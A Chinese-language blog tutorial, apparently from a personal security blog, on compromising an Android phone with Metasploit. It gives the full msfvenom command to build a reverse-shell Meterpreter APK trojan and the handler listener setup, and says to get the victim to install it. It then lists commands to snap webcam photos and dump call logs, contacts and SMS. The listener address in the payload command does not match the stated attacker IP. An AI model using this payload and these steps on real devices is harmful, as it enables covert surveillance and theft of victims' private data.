利用msf渗透Android手机

  1. 实验环境

实验环境

Kali:172.16.28.153
Android:172.16.28.158

首先用Msfvenom生成一个apk木马

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=4444 R > /root/apk.apk

然后msfconsole设置监听(默认监听端口4444)

1
2
3
4
5

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 172.16.28.153
run

想办法让受害者点击这个木马apk,这里没有做免杀,手机肯定会报出病毒的警告

我们会拿到一个meterpreter,这里可以输入 help/? 来查看我们能够输入的命令

我们来测试几条经常使用的命令:
check_root //检测是否为root权限

webcam_snap //通过摄像头拍照

dump_calllog //导出通话记录

dump_contacts //导出通讯录

dump_sms //导出短信内容

app_list //列出安装的app

还可以实时开启监控等命令,这里就不一一研究了


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:利用msf渗透Android手机

本文作者:sher10ck

发布时间:2019-11-18, 13:48:18

最后更新:2020-01-13, 12:48:52

原始链接:http://sherlocz.github.io/2019/11/18/利用msf渗透Android手机/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录